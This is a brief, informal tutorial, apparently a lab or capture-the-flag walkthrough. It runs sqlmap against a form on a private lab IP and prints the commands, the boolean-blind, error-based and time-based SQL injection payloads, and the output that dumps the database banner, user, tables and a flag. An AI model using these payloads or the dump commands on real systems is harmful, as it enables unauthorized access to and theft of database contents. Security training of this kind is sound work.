Sqlmap
sql injecton is too hard for you? or you are just too good to try and craft a contextual paylaod everytime?
Is trial and error your worst nighmare?
Is that time-based sqli vulneraility taking too long for you?
then we got something for you. Automate the boring stuff (kek) with sqlmap.
look How we effortlessly identify and exploit SQL injection vulnerabilities in this form
sqlmap -u http://10.10.145.151/ --forms -b
---
Parameter: msg (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: msg=auFb' RLIKE (SELECT (CASE WHEN (1109=1109) THEN 0x61754662 ELSE 0x28 END))-- GJgv
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: msg=auFb' AND GTID_SUBSET(CONCAT(0x71787a7671,(SELECT (ELT(7550=7550,1))),0x7171627671),7550)-- aFqL
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: msg=auFb' AND (SELECT 6882 FROM (SELECT(SLEEP(5)))Rgtr)-- NjzB
---
[00:05:38] [INFO] the back-end DBMS is MySQL
[00:05:38] [INFO] fetching banner
[00:05:38] [WARNING] reflective value(s) found and filtering out
[00:05:38] [INFO] retrieved: '5.7.28-0ubuntu0.16.04.2'
web server operating system: Linux Ubuntu
web application technology: PHP 7.0.33
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.6
banner: '5.7.28-0ubuntu0.16.04.2'
[00:07:25] [INFO] fetching current user
[00:07:25] [WARNING] reflective value(s) found and filtering out
[00:07:25] [INFO] retrieved: 'root@localhost'
current user: 'root@localhost'
[00:08:07] [INFO] fetching current database
[00:08:07] [WARNING] reflective value(s) found and filtering out
[00:08:07] [INFO] retrieved: 'tests'
current database: 'tests'
sqlmap -u http://10.10.145.151/ --forms -D tests --dump
[00:11:02] [INFO] fetching tables for database: 'tests'
[00:11:02] [INFO] resumed: 'lol'
[00:11:02] [INFO] resumed: 'msg'
[00:11:03] [INFO] fetching columns for table 'msg' in database 'tests'
[00:11:03] [WARNING] reflective value(s) found and filtering out
[00:11:03] [INFO] retrieved: 'msg'
[00:11:03] [INFO] retrieved: 'varchar(100)'
[00:11:03] [INFO] fetching entries for table 'msg' in database 'tests'
[00:11:03] [INFO] retrieved: 'msg'
[00:11:03] [INFO] retrieved: 'test'
Database: tests
Table: msg
[2 entries]
+------+
| msg |
+------+
| msg |
| test |
+------+
[00:11:04] [INFO] table 'tests.msg' dumped to CSV file '/home/ya_homie/.local/share/sqlmap/output/10.10.145.151/dump/tests/msg.csv'
[00:11:04] [INFO] fetching columns for table 'lol' in database 'tests'
[00:11:04] [INFO] retrieved: 'flag'
[00:11:05] [INFO] retrieved: 'varchar(100)'
[00:11:05] [INFO] fetching entries for table 'lol' in database 'tests'
[00:11:05] [INFO] retrieved: 'found_me'
Database: tests
Table: lol
[1 entry]
+----------+
| flag |
+----------+
| found_me |
+----------+
7b304f3 @ 2024-11-15